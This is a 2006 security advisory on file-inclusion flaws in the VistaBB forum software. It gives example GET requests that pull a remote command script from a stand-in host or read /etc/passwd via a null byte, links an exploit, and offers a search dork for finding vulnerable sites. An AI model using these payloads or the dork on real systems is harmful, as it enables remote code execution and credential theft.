--Security Report-- Advisory: VistaBB <= 2.x Multiple File Inclusion Vulnerabilities --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 24/08/06 03:00 AM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx@xxxxxxxxxx Web: http://www.nukedx.com } --- Vendor: VistaBB (http://www.vistabb.net) Version: 2.033 and prior versions must be affected. About: Via this methods remote attacker can include arbitrary files to VistaBB.Variable phpbb_root_path did not sanitized properly before using it on includes/functions_mod_user.php and includes/functions_portal.php so remote attacker can include internal and external files to VistaBB For including internal files magic_quotes_gpc must be off on server settings because remote attacker needs to use null char at the end of filename. Eg: /etc/passwd%00 Level: Highly Critical --- How&Example: GET -> http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=[FILE] EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=http://yoursite.com/cmd.txt? EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=/etc/passwd%00 <- mq off GET -> http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=[FILE] EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=http://yoursite.com/cmd.txt? EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=/etc/passwd%00 <- mq off --- Timeline: * 24/08/2006: Vulnerability found. * 24/08/2006: Contacted with vendor and waiting reply --- Exploit: http://www.nukedx.com/?getxpl=48 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=48 --- Dorks: "Powered by VistaBB"